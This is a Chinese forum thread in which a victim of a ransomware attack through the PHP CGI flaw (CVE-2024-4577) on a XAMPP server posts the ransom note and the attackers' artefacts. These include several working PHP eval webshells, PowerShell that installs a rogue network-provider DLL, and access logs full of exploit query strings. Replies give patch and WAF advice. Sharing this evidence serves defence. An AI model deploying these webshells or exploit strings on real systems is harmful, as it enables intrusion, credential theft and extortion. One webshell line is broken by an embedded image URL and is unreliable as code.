最新的PHP CGI漏洞导致XMAPP和PHP用户被黑客攻击
本帖最后由 w1230147 于 2024-6-13 23:22 编辑最近个人利用XMAPP搭建的接口服务器频繁被黑客利用PHP CGI漏洞攻击成功加密勒索,火绒杀毒压根毫无抵抗能力,导致我的文件全部被加密
文尾附上大神给出的对应解决方案
勒索信
send 0.1btc to my address:bc1qnuxx83nd4keeegrumtnu8kup8g02yzgff6z53l. contact email:service@cyberkiller.xyz,if you can't contact my email, please contact some data recovery company(suggest taobao.com), may they can contact to me .your id: ATNt6+ZtVrCIeFC5U1BRk2lfVnH9PMkBcgHIXRMbbGMooep42uYkswPJ5fvKEk9SqwNkoF4827E84M6FBDOXxPxqu8dNGY7pp7gZ2zlvs2srDFiriNwCE9q37l7BBKEwGG0cL4LSvHrEvqdjUWlgF+9rUkCJlmELdpV7ZipiGLPELmuM//t9oPRdQ1EABoSp1tx85N06HUgoQcLeGywGWVd1C8IduVfkTTJCYddh2onnpai3wtCaac7dsE1079NHGCmmNVgHCnbojJWBGttYlrzQ8KHaJwtbfo108XTvb25fdD2Wafjy77ucY7kbEvk8JirTzcgVmd76f3NcuoEfQzVU4JT3MB5i6pgPgDQ45RkGW/Q8OaCW27MFj5VB8EvTwvO6uIbR1Yk0vQDKXNC/3FNFvp8nSNanGFKjg+VnrV/VfqghF/G/RBZAudLa920oq/hiTF1qER75tDSOOY2wJJDirt65V4bKUTPJdC6xSlhZjEr4YtTTuucBUJ7sSwe/KdgOY1EnI3zkTDkXvuyzERQSbbXUFMUv8rMr98tgTqwsALtzZUZ7Du3nAqsLBHPDvvnT+66LYiJpDFgdEHVgq43PBiyKDT3S6PyaEr49sYE/8tLDxJR2gQwflfWgEa0fcS1I5PvygZUiPc8Lpk/eryFxi5kGtsUJh/LlQocWq2ZK3w37La7wHNAAQpay0TDN6wNU6pQrA1TRy5fq7rTFf6yyqKdBlnNfcpPo4vLESRESYDf09nw6+6pePm0m2XDBvpGICc1CQo+OZyRTuSGFesg0QAlrbEsb271H0O25BM3Qnlnb8BYIEqY+bTF/uYkRmiJzhVaKCFCZ/V/MjonQCP+glza8sGAQAruCNd2wfWvznJUs5GiI6fCBUPTvWrxjacxCHBo/dUHSgBeeKvEVyGVxiOL6kIeW37EGFXqnLavAgZ9LxYe0RpnD5iq8H5zCPeeUh2FS43vSLoCUalHdSbw1ooDdrGijX/DimcOEgxBjSY+QbAfaLrywFxwWTnrvwcOthF/3nY+XS6FaJ1Hs2Z5xdyt2v9iHwK/eIIU+DjsbooTU43WOduEE9H09T1uHEoAYoNSD61tLsXEi4ruOmVB4lxS/ak6LB/JenRIDpEIQEm3hhwM82LLHuvVkw3U6WSoFMCcpdoZwAoBX6Bjkmi5t9Hg0lZU3q0i95ySfdbzJFE=
无语啊,好在一直白嫖阿里云盘,对关键应用进行了时时备份。重装云服务器,花了四个多小时搭建好环境{:1_923:}
然后安装了腾讯管家和360卫士,在恶意代码运行起到一定防范作用,但是黑客还是能利用漏洞创建管理员用户在系统关键位置释放exe,dll及hotdoc文件夹创建恶意PHP脚本和powershell脚本,吓的我都不敢开HTTP服务。关闭80端口及防火墙设置,但是依然毛用都没
附上黑客入侵的痕迹:wwqwq
<?php
@error_reporting(0);
function Decrypt($data)
{
$key="e45e329feb5d925b";
return openssl_decrypt(base64_decode($data), "AES-128-ECB", $key,OPENSSL_PKCS1_PADDING);
}
$post=Decrypt(file_get_contents("php://input"));
@eval($post);
?>
<?php
2
$p=$_COOKIE;(count($p)==12&&in_array(gettype($p).count($p),$p))?(($p=substr($p,5).substr($p,8).substr($p,4).substr($p,5).substr($p,5).substr($p,1).substr($p,2).substr($p,3))&&($p=$p(substr($p(substr($p,15)),12)))&&($p=$p($p,$p(substr($p(substr($p,13)),14))))&&$p()):$p;
3
?>
Mobile_config<?php $NotFound=create_function(base64_decode("JA==").chr(114195/993).str_rot13("b").str_rot13("z").chr(708-607),chr(0xc60e/0x1f6).base64_decode("dg==").str_rot13("n").chr(390-282).chr(0x1ae-0x186).chr(0x3ac-0x388).chr(0xd561/0x1db).base64_decode("bw==").base64_decode("bQ==").base64_decode("ZQ==").str_rot13(")").chr(798-https://attach.52pojie.cn//forum/202406/13/230138cz1mmxqamjm9drfa.png?l739));$part1="OTM2NDM3";$part2="O0BldmFs";$part3="KCRfUE9T";$part4="VFsnc29t";$part5="ZXRoaW5n";$part6="J10pOzI4";$part7="MDkzMTE7";$encoded=$part1.$part2.$part3.$part4.$part5.$part6.$part7;$NotFound(base64_decode($encoded));$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER$UpdatedValue = $Path.PROVIDERORDER + ",Powermanager"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\Powermanager
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\Powermanager\NetworkProvider
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\Powermanager\NetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\Powermanager\NetworkProvider -Name "Name" -Value Powermanager
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\Powermanager\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\appverify.dll"
最后终于2024年6月12日下午有大神发布了针对这次漏洞的防范方法,附上设置后卫士和管家的防范日志,貌似是暂时堵住了,但是下一个漏洞被挖掘还能防的住么{:1_936:}
不看XMAPP日志不知道一看日志吓一跳
老美和台湾黑客一直在利用PHP CGI漏洞 坚持不懈不停的攻克我的服务器,我该如何反击:@
49.85.79.223 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 305
162.216.149.99 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 284
185.59.223.68 - - "GET / HTTP/1.0" 362
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 349
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
146.70.200.117 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe/?%ADd+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0 HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 390
103.166.86.154 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 204
146.70.200.117 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe/?%ADd+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0 HTTP/1.1" 204
87.236.176.13 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 283
104.234.204.32 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /assets/.git/config HTTP/1.1" 204
104.234.204.32 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /assets/.git/config HTTP/1.1" 204
218.75.105.196 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.php?%ADd+allow_url_include%3Don+%ADd+auto_prepend_file%3Dphp%3A//input HTTP/1.1" 294
77.36.2.28 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 204
77.36.2.28 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 204
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 345
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 284
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /favicon.ico HTTP/1.1" 204
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /favicon.ico HTTP/1.1" 204
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.php?%ADd%20allow_url_include%3d1%20-d%20auto_prepend_file%3dphp://input HTTP/1.1" 307
123.57.13.121 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 290
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 294
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 345
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /favicon.ico HTTP/1.1" 204
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /favicon.ico HTTP/1.1" 204
66.103.201.244 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /index.php?%ADd%20allow_url_include%3d1%20-d%20auto_prepend_file%3dphp://input HTTP/1.1" 257
223.113.128.227 - - "GET / HTTP/1.0" 362
223.113.128.227 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 350
223.113.128.227 TLSv1.3 TLS_AES_256_GCM_SHA384 "t3 12.1.2\n" 226
184.94.212.101 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 204
184.94.212.101 TLSv1.3 TLS_AES_256_GCM_SHA384 "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3dOn+-d+auto_prepend_file%3dphp://input+-d+error_reporting%3d0 HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 348
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /favicon.ico HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /robots.txt HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /sitemap.xml HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /axis2-admin/ HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /axis2/ HTTP/1.1" 204
106.75.101.79 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET /axis2/axis2-admin/ HTTP/1.1" 204
52.160.33.137 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /owa/auth/x.js HTTP/1.1" 204
34.22.208.68 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 292
172.169.2.103 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /version HTTP/1.1" 204
220.133.168.167 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 204
220.133.168.167 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 204
220.133.168.167 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 204
123.57.13.121 TLSv1.3 TLS_AES_256_GCM_SHA384 "GET / HTTP/1.1" 256
最后附上大神给出的PHP CGI漏洞设置方法 https://www.163.com/dy/article/J4GA0GDN05567S03.html
换 Linux 或升级 PHP,这个漏洞只影响 Windows。
修了的 PHP 版本:8.1.29、8.2.20、8.3.8(更新日志,关键字 CVE-2024-4577)
8.0.x 或更低、8.0.x、8.1.0~28、8.2.0~19、8.3.0~7 没有这个安全补丁。 火绒杀毒压根毫无抵抗能力,腾讯管家和360卫士,在恶意代码运行起到一定防范作用,但是……老美和台湾黑客一直在利用PHP CGI漏洞 坚持不懈不停的攻克我的服务器,我该如何反击:@ 装安全软件吧,实在不行,付费的也可以的。
要不然就自己能解决,可以不装。
这种情况很难受的。
我遇到就是关机处理,
实在没有什么办法好解决。 本帖最后由 ZhjhJZ 于 2024-6-14 14:02 编辑
火绒杀毒压根毫无抵抗能力,腾讯管家和360卫士,在恶意代码运行起到一定防范作用,但是……黑客一直在利用PHP CGI漏洞 坚持不懈不停的攻克我的服务器,该如何反击{:1_909:} 这个??360腾讯管家是真的么??? 我这天天被扫,大部分是国外IP,禁止国外IP访问后清静多了。
国内也会有个别IP扫我,我发现一个封一个。 感谢大佬分享,小白表示瑞斯拜{:301_993:} 这个漏洞好像针对的是线上windows服务器centOs 搭建的话 就没有影响 上cwpp和waf吧,waf用雷池可以白嫖。你这些pc的安全软件真的不太管用
页:
[1]
2